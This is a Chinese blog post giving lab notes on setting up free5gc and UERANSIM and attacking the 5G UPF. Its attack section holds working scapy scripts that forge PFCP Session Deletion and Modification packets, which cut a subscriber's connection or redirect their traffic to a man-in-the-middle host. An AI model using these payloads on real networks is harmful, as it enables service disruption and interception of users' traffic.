<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>UPF 攻击（断网、会话劫持） - Kanoon的小站</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Kanoon的小站"><meta name="msapplication-TileImage" content="/image/head.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Kanoon的小站"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="记录一下最近做 UPF 攻击的心得体会。"><meta property="og:type" content="blog"><meta property="og:title" content="UPF 攻击（断网、会话劫持）"><meta property="og:url" content="https://www.kanoon.cn/2023/04/19/upf-attack/"><meta property="og:site_name" content="Kanoon的小站"><meta property="og:description" content="记录一下最近做 UPF 攻击的心得体会。"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://www.kanoon.cn/img/og_image.png"><meta property="article:published_time" content="2023-04-19T12:31:55.000Z"><meta property="article:modified_time" content="2023-04-30T12:52:56.998Z"><meta property="article:author" content="Kanoon"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://www.kanoon.cn/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.kanoon.cn/2023/04/19/upf-attack/"},"headline":"UPF 攻击（断网、会话劫持）","image":["https://www.kanoon.cn/img/og_image.png"],"datePublished":"2023-04-19T12:31:55.000Z","dateModified":"2023-04-30T12:52:56.998Z","author":{"@type":"Person","name":"Kanoon"},"publisher":{"@type":"Organization","name":"Kanoon的小站","logo":{"@type":"ImageObject","url":"https://www.kanoon.cn/image/head.jpg"}},"description":"记录一下最近做 UPF 攻击的心得体会。"}</script><link rel="canonical" href="https://www.kanoon.cn/2023/04/19/upf-attack/"><link rel="icon" href="/image/head.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/image/head.jpg" alt="Kanoon的小站" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2023-04-19T12:31:55.000Z" title="2023/4/19 20:31:55">2023-04-19</time>发表</span><span class="level-item"><time dateTime="2023-04-30T12:52:56.998Z" title="2023/4/30 20:52:56">2023-04-30</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></span><span class="level-item">7 分钟读完 (大约1026个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">UPF 攻击（断网、会话劫持）</h1><div class="content"><p>记录一下最近做 UPF 攻击的心得体会。</p>
<span id="more"></span>
<h2 id="环境配置"><a class="markdownIt-Anchor" href="#环境配置"></a> 环境配置</h2>
<p>UERANSIM：<a target="_blank" rel="noopener" href="https://github.com/aligungr/UERANSIM/wiki/Installation">https://github.com/aligungr/UERANSIM/wiki/Installation</a></p>
<p>free5gc：<a target="_blank" rel="noopener" href="https://github.com/free5gc/free5gc/wiki/Installation">https://github.com/free5gc/free5gc/wiki/Installation</a></p>
<p>gtp5g：<a target="_blank" rel="noopener" href="https://github.com/free5gc/gtp5g%EF%BC%88%E8%BF%90%E8%A1%8C">https://github.com/free5gc/gtp5g（运行</a> UPF 网元所需，可在 free5gc 的文件夹里配置）</p>
<p>UERANSIM + free5gc：<a target="_blank" rel="noopener" href="https://www.free5gc.org/installations/stage-3-sim-install/">https://www.free5gc.org/installations/stage-3-sim-install/</a></p>
<p>官方教程大都很详细了，下面列出一些配置过程中需要注意的地方。</p>
<h3 id="git"><a class="markdownIt-Anchor" href="#git"></a> git</h3>
<p>ubuntu 中配置环境很多时候都要用到 <code>git clone</code> 命令，这时可以考虑使用 github 镜像：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git config --global url.<span class="string">&quot;https://kgithub.com/&quot;</span>.insteadOf <span class="string">&quot;https://github.com/&quot;</span></span><br></pre></td></tr></table></figure>
<p>执行该条命令后访问 <code>https://github.com/</code> 开头的资源都会被替换为国内 <code>https://kgithub.com/</code> 的镜像。</p>
<h3 id="go"><a class="markdownIt-Anchor" href="#go"></a> go</h3>
<p>free5gc 运行过程中涉及到很多 go 包的下载，可以通过以下命令设置为国内代理。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn</span><br></pre></td></tr></table></figure>
<h3 id="free5gc"><a class="markdownIt-Anchor" href="#free5gc"></a> free5gc</h3>
<h4 id="shell"><a class="markdownIt-Anchor" href="#shell"></a> shell</h4>
<p>在 UERANSIM + free5gc 的教程中核心网主机需要执行以下四条命令，主要功能是对来自 UERANSIM 的数据包进行转发封装，使得自己成为 UERANSIM 与外网间的一个中继：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo sysctl -w net.ipv4.ip_forward=1</span><br><span class="line">sudo iptables -t nat -A POSTROUTING -o enp0s3 -j MASQUERADE</span><br><span class="line">sudo systemctl stop ufw</span><br><span class="line">sudo iptables -I FORWARD 1 -j ACCEPT</span><br></pre></td></tr></table></figure>
<p>在第二条命令中，需要将 enp0s3 替换为系统的默认网卡，如 ubuntu 20.04 中即为 ens33 。</p>
<h4 id="clone-upf"><a class="markdownIt-Anchor" href="#clone-upf"></a> clone UPF</h4>
<p>进行断网和劫持攻击需要克隆一台新的虚拟机来运行 UPF 网元，本机的环回地址无法执行以上攻击。</p>
<p>另外，克隆主机需要将 upfcfg 文件中的一些参数改为本机 ip 。</p>
<h4 id="config"><a class="markdownIt-Anchor" href="#config"></a> config</h4>
<p>free5gc 主要需要对 amfcfg、smfcfg、upfcfg 这三个文件进行设置，</p>
<p>在旧版本中，UPF 网元的配置文件目录为 free5gc/NFs/upf/build/config/upfcfg.yaml，二进制文件目录为 free5gc/NFs/upf/build/bin/free5gc-upfd，启动命令为 <code>sudo -E ./bin/free5gc-upfd</code> ；</p>
<p>在新版本中，UPF 网元的配置与二进制文件与其他网元一样，分别在 free5gc/bin 和 free5gc/config 这两个目录下。</p>
<p>以下只列出配置文件中的更改项。</p>
<p>AMF</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">ngapIpList:</span>  <span class="comment"># the IP list of N2 interfaces on this AMF</span></span><br><span class="line">    <span class="bullet">-</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.128</span> <span class="comment">#   UERANSIM 所在主机 IP，用于监听 NGAP 消息</span></span><br></pre></td></tr></table></figure>
<p>SMF</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">pfcp:</span></span><br><span class="line">	<span class="attr">addr:</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.128</span> <span class="comment">#   本机 IP，用于向 UPF 发送 PFCP 消息</span></span><br><span class="line">	</span><br><span class="line">	<span class="attr">UPF:</span></span><br><span class="line">		<span class="attr">nodeID:</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.129</span> <span class="comment">#   UPF 网元所在主机 IP，即克隆主机 IP</span></span><br><span class="line">		</span><br><span class="line">		<span class="attr">interfaces:</span></span><br><span class="line">			<span class="attr">endpoints:</span> <span class="comment">#   UPF 网元所在主机 IP，即克隆主机 IP</span></span><br><span class="line">			  <span class="bullet">-</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.129</span></span><br></pre></td></tr></table></figure>
<p>UPF</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">pfcp:</span></span><br><span class="line">  <span class="attr">addr:</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.129</span>   <span class="comment">#   UPF 网元所在主机 IP，即克隆主机 IP</span></span><br><span class="line">  <span class="attr">nodeID:</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.129</span> <span class="comment">#   同上</span></span><br><span class="line"></span><br><span class="line"><span class="attr">gtpu:</span></span><br><span class="line">  <span class="attr">ifList:</span></span><br><span class="line">    <span class="bullet">-</span> <span class="attr">addr:</span> <span class="number">192.168</span><span class="number">.163</span><span class="number">.129</span> <span class="comment">#   同上</span></span><br></pre></td></tr></table></figure>
<h2 id="upf-攻击"><a class="markdownIt-Anchor" href="#upf-攻击"></a> UPF 攻击</h2>
<p>根据 UERANSIM 注册过程中抓到的 PFCP 包可进行以下两种攻击。</p>
<h3 id="断网攻击"><a class="markdownIt-Anchor" href="#断网攻击"></a> 断网攻击</h3>
<h4 id="步骤"><a class="markdownIt-Anchor" href="#步骤"></a> 步骤</h4>
<p>向 UPF 所在主机发送 <code>Sx Session Deletion Request</code> 包。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">send(IP(src=<span class="string">&quot;192.168.163.128&quot;</span>,dst=<span class="string">&quot;192.168.163.129&quot;</span>)/UDP(dport=<span class="number">8805</span>,sport=<span class="number">8805</span>)/<span class="built_in">bytes</span>([<span class="number">0x23</span>,<span class="number">0x36</span>,<span class="number">0x00</span>,<span class="number">0x0c</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x07</span>,<span class="number">0xc0</span>]))</span><br></pre></td></tr></table></figure>
<h4 id="注意事项"><a class="markdownIt-Anchor" href="#注意事项"></a> 注意事项</h4>
<p>SEID 字段的值需为 1，0 用于 Establishment ，旧版本中 2 及以上会报段错误。</p>
<h4 id="效果"><a class="markdownIt-Anchor" href="#效果"></a> 效果</h4>
<p>UPF 删除已有会话，UERANSIM 侧无法上网。</p>
<h3 id="会话劫持"><a class="markdownIt-Anchor" href="#会话劫持"></a> 会话劫持</h3>
<h4 id="步骤-2"><a class="markdownIt-Anchor" href="#步骤-2"></a> 步骤</h4>
<p>向 UPF 所在主机发送 <code>Sx Session Modification Request</code> 包。</p>
<p>将包中 <code>Outer Header Creation</code> 字段改为中间人 IP 。</p>
<h4 id="代码"><a class="markdownIt-Anchor" href="#代码"></a> 代码</h4>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">send(IP(src=<span class="string">&quot;192.168.163.128&quot;</span>,dst=<span class="string">&quot;192.168.163.129&quot;</span>)/UDP(dport=<span class="number">8805</span>,sport=<span class="number">8805</span>)/<span class="built_in">bytes</span>([<span class="number">0x23</span>,<span class="number">0x34</span>,<span class="number">0x00</span>,<span class="number">0x90</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x12</span>,<span class="number">0xc0</span>,<span class="number">0x00</span>,<span class="number">0x39</span>,<span class="number">0x00</span>,<span class="number">0x0d</span>,<span class="number">0x02</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x06</span>,<span class="number">0xc0</span>,<span class="number">0xa8</span>,<span class="number">0xa3</span>,<span class="number">0x80</span>,<span class="number">0x00</span>,<span class="number">0x09</span>,<span class="number">0x00</span>,<span class="number">0x35</span>,<span class="number">0x00</span>,<span class="number">0x38</span>,<span class="number">0x00</span>,<span class="number">0x02</span>,<span class="number">0x00</span>,<span class="number">0x0c</span>,<span class="number">0x00</span>,<span class="number">0x1d</span>,<span class="number">0x00</span>,<span class="number">0x04</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0xff</span>,<span class="number">0x00</span>,<span class="number">0x02</span>,<span class="number">0x00</span>,<span class="number">0x1b</span>,<span class="number">0x00</span>,<span class="number">0x14</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x02</span>,<span class="number">0x00</span>,<span class="number">0x16</span>,<span class="number">0x00</span>,<span class="number">0x09</span>,<span class="number">0x08</span>,<span class="number">0x69</span>,<span class="number">0x6e</span>,<span class="number">0x74</span>,<span class="number">0x65</span>,<span class="number">0x72</span>,<span class="number">0x6e</span>,<span class="number">0x65</span>,<span class="number">0x74</span>,<span class="number">0x00</span>,<span class="number">0x5d</span>,<span class="number">0x00</span>,<span class="number">0x05</span>,<span class="number">0x06</span>,<span class="number">0x0a</span>,<span class="number">0x3c</span>,<span class="number">0x00</span>,<span class="number">0x06</span>,<span class="number">0x00</span>,<span class="number">0x6c</span>,<span class="number">0x00</span>,<span class="number">0x04</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x0c</span>,<span class="number">0x00</span>,<span class="number">0x0a</span>,<span class="number">0x00</span>,<span class="number">0x36</span>,<span class="number">0x00</span>,<span class="number">0x6c</span>,<span class="number">0x00</span>,<span class="number">0x04</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x0c</span>,<span class="number">0x00</span>,<span class="number">0x2c</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x02</span>,<span class="number">0x00</span>,<span class="number">0x0b</span>,<span class="number">0x00</span>,<span class="number">0x25</span>,<span class="number">0x00</span>,<span class="number">0x2a</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x16</span>,<span class="number">0x00</span>,<span class="number">0x09</span>,<span class="number">0x08</span>,<span class="number">0x69</span>,<span class="number">0x6e</span>,<span class="number">0x74</span>,<span class="number">0x65</span>,<span class="number">0x72</span>,<span class="number">0x6e</span>,<span class="number">0x65</span>,<span class="number">0x74</span>,<span class="number">0x00</span>,<span class="number">0x54</span>,<span class="number">0x00</span>,<span class="number">0x0a</span>,<span class="number">0x01</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x06</span>,<span class="number">0xc0</span>,<span class="number">0xa8</span>,<span class="number">0xa3</span>,<span class="number">0x80</span>,<span class="number">0x00</span>,<span class="number">0x31</span>,<span class="number">0x00</span>,<span class="number">0x01</span>,<span class="number">0x00</span>]))</span><br></pre></td></tr></table></figure>
<h4 id="效果-2"><a class="markdownIt-Anchor" href="#效果-2"></a> 效果</h4>
<p>原本 UPF -&gt; UERANSIM 的包都会发给中间人。</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>UPF 攻击（断网、会话劫持）</p><p><a href="https://www.kanoon.cn/2023/04/19/upf-attack/">https://www.kanoon.cn/2023/04/19/upf-attack/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Kanoon</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2023-04-19</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2023-04-30</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2023/04/30/ABC-300/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">ユニークビジョンプログラミングコンテスト2023 春 (AtCoder Beginner Contest 300)【A - G】</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2023/03/10/CF-1802/"><span class="level-item">Codeforces Round 857 (Div. 2)【A - E】</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="content" id="valine-thread"></div><script src="//cdn.jsdelivr.net/npm/leancloud-storage@3/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@1.4.16/dist/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread',
            appId: "AoI0kqTv8Lun0B2XUQLnEJ4s-gzGzoHsz",
            appKey: "uKp4jNNdKyHW7ex4CRPwA4lQ",
            
            avatar: "mm",
            avatarForce: false,
            meta: ["nick","mail","link"],
            pageSize: 10,
            lang: "zh-CN",
            visitor: false,
            highlight: true,
            recordIP: false,
            
            
            
            enableQQ: false,
            requiredFields: [],
        });</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#环境配置"><span class="level-left"><span class="level-item">1</span><span class="level-item"> 环境配置</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#git"><span class="level-left"><span class="level-item">1.1</span><span class="level-item"> git</span></span></a></li><li><a class="level is-mobile" href="#go"><span class="level-left"><span class="level-item">1.2</span><span class="level-item"> go</span></span></a></li><li><a class="level is-mobile" href="#free5gc"><span class="level-left"><span class="level-item">1.3</span><span class="level-item"> free5gc</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#shell"><span class="level-left"><span class="level-item">1.3.1</span><span class="level-item"> shell</span></span></a></li><li><a class="level is-mobile" href="#clone-upf"><span class="level-left"><span class="level-item">1.3.2</span><span class="level-item"> clone UPF</span></span></a></li><li><a class="level is-mobile" href="#config"><span class="level-left"><span class="level-item">1.3.3</span><span class="level-item"> config</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="#upf-攻击"><span class="level-left"><span class="level-item">2</span><span class="level-item"> UPF 攻击</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#断网攻击"><span class="level-left"><span class="level-item">2.1</span><span class="level-item"> 断网攻击</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#步骤"><span class="level-left"><span class="level-item">2.1.1</span><span class="level-item"> 步骤</span></span></a></li><li><a class="level is-mobile" href="#注意事项"><span class="level-left"><span class="level-item">2.1.2</span><span class="level-item"> 注意事项</span></span></a></li><li><a class="level is-mobile" href="#效果"><span class="level-left"><span class="level-item">2.1.3</span><span class="level-item"> 效果</span></span></a></li></ul></li><li><a class="level is-mobile" href="#会话劫持"><span class="level-left"><span class="level-item">2.2</span><span class="level-item"> 会话劫持</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#步骤-2"><span class="level-left"><span class="level-item">2.2.1</span><span class="level-item"> 步骤</span></span></a></li><li><a class="level is-mobile" href="#代码"><span class="level-left"><span class="level-item">2.2.2</span><span class="level-item"> 代码</span></span></a></li><li><a class="level is-mobile" href="#效果-2"><span class="level-left"><span class="level-item">2.2.3</span><span class="level-item"> 效果</span></span></a></li></ul></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="column-right-shadow is-hidden-widescreen"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/image/head.jpg" alt="Kanoon"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Kanoon</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">21</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">2</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">32</p></a></div></div></nav><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/kanoon-zh"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Email" href="mailto:kanoon-zh@qq.com"><i class="fas fa-envelope"></i></a></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-07-19T19:36:40.000Z">2024-07-20</time></p><p class="title"><a href="/2024/07/20/test/">test</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-05-09T08:29:41.000Z">2023-05-09</time></p><p class="title"><a href="/2023/05/09/CF-1825/">Codeforces Round 872 (Div. 2)【A - D2】</a></p><p class="categories"><a href="/categories/%E7%AE%97%E6%B3%95/">算法</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-05-07T03:19:29.000Z">2023-05-07</time></p><p class="title"><a href="/2023/05/07/CF-1826/">Codeforces Round 870 (Div. 2)【A - E】</a></p><p class="categories"><a href="/categories/%E7%AE%97%E6%B3%95/">算法</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-05-06T03:01:51.000Z">2023-05-06</time></p><p class="title"><a href="/2023/05/06/template/">Template</a></p><p class="categories"><a href="/categories/%E7%AE%97%E6%B3%95/">算法</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-04-30T12:57:39.000Z">2023-04-30</time></p><p class="title"><a href="/2023/04/30/meet-in-the-middle/">Meet in the Middle</a></p><p class="categories"><a href="/categories/%E7%AE%97%E6%B3%95/">算法</a></p></div></article></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/%E5%AE%89%E5%85%A8/"><span class="level-start"><span class="level-item">安全</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/%E7%AE%97%E6%B3%95/"><span class="level-start"><span class="level-item">算法</span></span><span class="level-end"><span class="level-item tag">19</span></span></a></li></ul></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/image/head.jpg" alt="Kanoon的小站" height="28"></a><p class="is-size-7"><span>&copy; 2024 Kanoon</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.15.1/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex@0.15.1/dist/katex.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/katex@0.15.1/dist/contrib/auto-render.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/katex@0.15.1/dist/contrib/mhchem.min.js" defer></script><script>window.addEventListener("load", function() {
            document.querySelectorAll('[role="article"] > .content').forEach(function(element) {
                renderMathInElement(element);
            });
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>